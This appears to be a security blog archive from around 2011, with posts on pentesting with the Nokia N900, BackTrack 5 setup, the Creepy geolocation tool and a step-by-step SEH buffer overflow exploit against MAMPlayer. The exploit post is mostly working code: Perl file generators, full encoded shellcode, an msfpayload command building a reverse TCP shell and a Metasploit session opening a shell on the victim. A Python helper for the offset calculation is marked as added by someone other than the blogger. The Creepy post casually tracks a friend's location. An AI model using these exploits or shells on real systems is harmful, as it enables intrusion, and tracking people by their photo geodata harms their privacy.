To pwn with the pwnimage or not on the Nokia N900


Hackers For Charity

Pwnie Express has just released the pwnimage for the Nokia N900 to the community: http://www.pwnieexpress.com/pwn_phone.html. The pwnimage is an easy-to-use customized N900 image suited for pentests. It contains some of the tools you would find in BackTrack. I got some time today and installed the image on my phone. Below is a screenshot. The question I have is: do I use this pwnimage or my manually customized N900?

Reasons for the pwnimage
The image comes with preinstalled tools and easy-to-use shortcuts on the desktop that start applications fast, such as WiFizoo, packet injection, sslstrip, Metasploit, nmap, fake AP, etc. This saves time for any pentester. With just a single click most of these tools will run. It's awesome.

Reasons against the pwnimage
There is a licence agreement saying you cannot reverse engineer the software etc., which is a little peculiar because most of this software is under the GNU or BSD licence.
I try to be paranoid, not running on not-so-common platforms because of backdoors, etc.

My conclusion: I will use the pwnimage. First, it is a really good idea to have your N900 set up in such an easy mode to pwn for any pentest. I remember when BackTrack v1 was released back then, some people argued that you could compile all those packages alone. Right now BackTrack is the most widely used pentesting distro. It's not that I cannot run ./configure; make; make install or apt-get install, and I love spending some sleepless nights trying to tweak my N900; it's just that the time saved and bringing all these packages together to work perfectly takes skill and takes time.
Several projects have come up, such as Neopwn, which was a little hyped up but we haven't seen anything come out of it. I can run BackTrack 5 on my N900, but it is a little too slow and the screen calibration on my N900 is really not working perfectly.
Aside from the fears, I know if we, the "community", can really pick up this pwnimage and improve it, I'm sure there are better things in the future for the N900. Thanks to Pwnie Express for releasing this. I choose to pwn.


Pimped by Hackers For Charity



Just back from Uganda, where I had gone for some business and also took time to visit Johnny Long. He is doing well and his family is OK, although he really needs your support. Today is the last day to vote for Drobos, so keep voting for HFC: http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/
I also saw Sophos challenging LulzSec to follow in the way of Johnny Long. Wouldn't that be something: http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/
It is always a pleasure meeting such a great and humble person as Johnny. Apart from catching up, Johnny gave me so much gear and swag. Here are some photos.

Johnny on "the beast". He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. 🙂 It's now easier to navigate Jinja with this bike. It was a miracle how Johnny got it; I guess he will soon blog about it.

Johnny's presentation badge for ShmooCon 🙂 and notice the cool red Black Hat bag.

Shmoo mouse pad

Some hardware hacking stuff; you had to program it to read "ninja party" to be allowed into the party.

This shirt is to kill for... literally. It is a collector's item that has a different logo on the back. It was specifically for the ShmooCon conference. I am honored to get this.

HFC stickers to spread the word to all the world.


Installing VirtualBox on BackTrack 5



BackTrack 5 doesn't come with the kernel headers installed, so you will need to prepare them first and then proceed with installing VirtualBox. The commands are listed below.

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, add the VirtualBox repository to /etc/apt/sources.list as shown below, import its signing key and install VirtualBox.

root@bt # echo "deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free" >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0


BackTrack 5 on the Nokia N900



Just managed to get my sweet Nokia N900 phone to run BT5 :). For me to write a tutorial on this would be an injustice, because the steps have been documented properly on this blog: http://pcsci3nce.info/?p=177

Update: the blog shut down, but you can access the tutorial via the Wayback Machine at this link:

https://web.archive.org/web/20110518160620/http://pcsci3nce.info/?p=177

Below is a screenshot of my phone.


Creepy…………….



Last year at DojoCon, Dave Marcus gave a really awesome talk about using social networks to profile, find and 0wn your victims. During the video he was able to track, from Twitter geodata, a person using LOIC to perform a distributed denial of service (DDoS).
Guess what, now there is software released to do this mainstream. Thanks to Yiannis Kakavas, Creepy is alive. All you need is the Twitter ID or Flickr username of someone. It finds photos that somebody uploaded, extracts geolocation information from these pics and maps exactly where the data came from. It is possible for you to track somebody's movement over time and even locate their home, if they ever tweeted from home. This awesome information gathering tool can be found here: https://github.com/ilektrojohn/creepy/downloads
It's time to turn off the GPS geolocation features on our phones. Kindly read more about the tool here: http://www.thinq.co.uk/2011/3/30/creepy-app-warns-end-privacy/
I used a friend's Twitter ID and pulled the map below. Now that is really creepy 🙂

User interface

Feed the username and get your data.


Nokia N900



I finally managed to get my hands on a Nokia N900. I will let the pictures do the talking, but it is just the most awesome phone to have. I had so much fun configuring it to work as my ultimate pentesting phone. Packet injection works OK, and so many pentesting tools can be installed. Enjoy my phone's screenshots. There is a series on "Weaponizing the Nokia N900", and there are also interesting tutorials at the following links:
https://www.infosecisland.com/blogview/5640-Weaponizing-the-Nokia-N900-Part-1.html
https://www.infosecisland.com/blogview/9921-Weaponizing-the-Nokia-N900-Part-3.html
https://www.infosecisland.com/blogview/8056-Weaponizing-the-Nokia-N900-Part-2.html
http://zitstif.no-ip.org/?p=451
http://zitstif.no-ip.org/?p=459
http://www.knownokia.ca/
http://pwnieexpress.com/pwn_phone.html

The innocent looking phone.

My "desktop"

The Debian LXDE; you can also chroot to /home. I love the game Crazy Chicken. Really easy and fun to play. Don't judge me 🙂

Looks familiar? I'm still testing and reconfiguring most tools from my BackTrack distro.

Metasploit on the N900, need I say more...


Yes, that's Meterpreter 🙂

Ettercap for MITM. It's possible to combine this with sslstrip 🙂

Packet injection works with the bleeding-edge wl1251 driver.


Another SEH tutorial



The application we will look at can be downloaded here:
http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
The exploit has been documented here:
http://www.exploit-db.com/exploits/15901/
but we will go through the process of creating the exploit from scratch.
Credits to Corelan for their great exploit writing tutorials.

First, confirm that the crash really takes place. Fill the buffer with around 5000 A's:

use strict;
use warnings;

my $filename = "firstcrash.mamx";
my $junk = "A" x 5000;       # 5000 A's to overrun the buffer
my $payload = $junk;
open(my $FILE, '>', $filename) or die "Cannot open $filename: $!";
binmode($FILE);              # raw bytes, no newline translation
print $FILE $payload;
close($FILE);

Open the program with WinDbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Press F5 (or type g) and confirm with !exchain that this is an SEH problem:

0:000> g
(538.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x414140f0:
41414141 ?? ???
0:000> !exchain
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)
0012f6b0: MAM2006+3c078 (0043c078)
0012f6ec: MAM2006+3c078 (0043c078)
0012fa60: +414140f0 (41414141)
Invalid exception stack at 41414141

Second, send the 5000 characters as a Metasploit pattern so that we can determine exactly where the crash takes place:

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 > /home/chalo/pgm/sploitattion/fat/crash.mamx

Open MAMPlayer with WinDbg again and open the crash.mamx file. The application crashes again. Press F5 or g, and then load the byakugan plugin from Metasploit to determine the offset:

0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 5000
[Byakugan] Control of ecx at offset 116.
[Byakugan] Control of eip at offset 116.
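As an added example (not part of the original post or of Metasploit), the pattern_create / pattern_offset step above done in Python: it rebuilds the Metasploit cyclic pattern, recovers the offset from the register value as WinDbg prints it, and derives the nSEH, handler and shellcode positions that the later "116-4" and "jump 6 bytes" steps rely on. The register value 39644138 is a constructed sample, chosen so that it maps to the offset 116 reported above.

```python
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Ab0... (20280 unique bytes)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(value, length=5000):
    """Find where a crash value sits in the pattern of the given length.

    value may be the 4 ASCII bytes themselves ('8Ad9') or the register value
    as WinDbg prints it ('39644138'). A hex register value is byte-swapped,
    because x86 is little-endian and the register was loaded from the buffer.
    Returns -1 if the value is not part of the pattern.
    """
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        chunk = bytes.fromhex(value)[::-1].decode("ascii")
    else:
        chunk = value
    return pattern_create(length).find(chunk)


def seh_layout(handler_offset):
    """Derive the record layout from the offset of the overwritten handler.

    An SEH record is 8 bytes: nSEH (next-record pointer) directly followed by
    the handler pointer, so the filler ends 4 bytes before the handler.
    The short jump EB 06 placed in nSEH is 2 bytes long and skips 6 more
    (2 padding bytes + the 4-byte handler), landing right after the record.
    """
    junk = handler_offset - 4
    return {
        "junk_len": junk,            # "A" x 112 in the tutorial (116 - 4)
        "nseh": junk,                # \xeb\x06\x90\x90
        "seh": handler_offset,       # pop pop ret address
        "shellcode": junk + 2 + 6,   # where the jmp lands: 120
    }


if __name__ == "__main__":
    # constructed: ecx as WinDbg would show it after the pattern overwrote it
    off = pattern_offset("39644138")
    print("handler overwritten at offset", off)   # 116
    print(seh_layout(off))
```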

We now need a pop pop ret address to use. We can check the DLLs that load for the MAMPlayer application and use msfpescan from Metasploit to look for a workable address. Checking WinDbg, we notice some DLLs that MAMPlayer uses:

ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 10000000 10050000 C:\WINDOWS\system32\VBoxOGL.dll
ModLoad: 01780000 017c0000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

We copy msacm32.drv over to our Linux box and use msfpescan to get addresses we can use as the SEH handler:

root@bt:/pentest/exploits/framework3# ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv > /home/chalo/pgm/sploitattion/fat/memaddresses.txt
root@bt:/home/chalo/pgm/sploitattion/fat# grep "pop edi; pop esi; " memaddresses.txt
0x72d11225 pop edi; pop esi; retn 0x000c
0x72d11f39 pop edi; pop esi; retn 0x0004
0x72d1263d pop edi; pop esi; retn 0x0008
0x72d1269c pop edi; pop esi; retn 0x0008

We now need to check what the stack looks like. We put breakpoints in our code:

my $filename = "crash3.mamx";
my $junk = "A" x 112;                # 116 - 4: the 4-byte nSEH field sits before the handler
my $nseh = "\xcc\xcc\xcc\xcc";       # breakpoints in nSEH so execution stops right here
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn 0x0004 (msacm32.drv), little-endian
my $shellcode = "1234567890qwertyuiopasdfghjkl";  # marker bytes to spot in the stack dump
my $junk2 = "D" x 300;

my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "Cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Let's check the stack:

0:000> g
(88.4ac): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa0f:
0012fa60 cc int 3
0:000> d eip
0012fa60 cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38 ….9..r12345678
0012fa70 39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e 90abcdefghijklmn
0012fa80 6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44 opqrstuvwxyzDDDD
0012fa90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Good, no gaps between our bytes. Now we just need to set our next SEH handler (nSEH) to jump 6 bytes. Replace the shellcode with breakpoints:

my $filename = "crash3.mamx";
my $junk = "A" x 112;                # 116 - 4
my $nseh = "\xeb\x06\x90\x90";       # jmp short +6: over the handler address to the shellcode
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn 0x0004
my $shellcode = "\xcc\xcc\xcc\xcc";  # breakpoints where the shellcode will go
my $junk2 = "D" x 300;

my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "Cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Checking the stack again:

0:000> g
(3a8.5f0): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa17:
0012fa68 cc int 3
0:000> d eip
0012fa68 cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44 ….DDDDDDDDDDDD
0012fa78 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa88 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa98 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Replace the breakpoints with real shellcode from msfpayload to pop a calc and pwn the application:

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c

So the new code becomes:

my $filename = "crash5.mamx";
my $junk = "A" x 112;                # 116 - 4
my $nseh = "\xeb\x06\x90\x90";       # jmp short +6 over the handler address
my $seh = pack('V', 0x72d11f39);     # pop edi; pop esi; retn 0x0004

# windows/exec CMD=calc.exe, encoded with x86/alpha_upper (output of msfencode above)
my $shellcode =
"\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43" .
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41" .
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" .
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" .
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45" .
"\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44" .
"\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56" .
"\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a" .
"\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43" .
"\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d" .
"\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56" .
"\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b" .
"\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e" .
"\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50" .
"\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c" .
"\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c" .
"\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54" .
"\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44" .
"\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49" .
"\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c" .
"\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b" .
"\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49" .
"\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c" .
"\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d" .
"\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56" .
"\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e" .
"\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d" .
"\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30" .
"\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52" .
"\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53" .
"\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43" .
"\x30\x54\x4a\x41\x41";

my $junk2 = "D" x 300;
my $payload = $junk . $nseh . $seh . $shellcode . $junk2;
open(my $FILE, '>', $filename) or die "Cannot open $filename: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);

Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do tasks such as a reverse shell on a TCP port:

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c

Then change your shellcode above from calc to the new reverse shell shellcode. Set up your Metasploit listener first, and after that open the new file with MAMPlayer. Boom!!!! 🙂 You get your reverse shell back.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.1:4444
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.10.130
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\bb\Desktop\rr\fat>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\Documents and Settings\bb\Desktop\rr\fat>
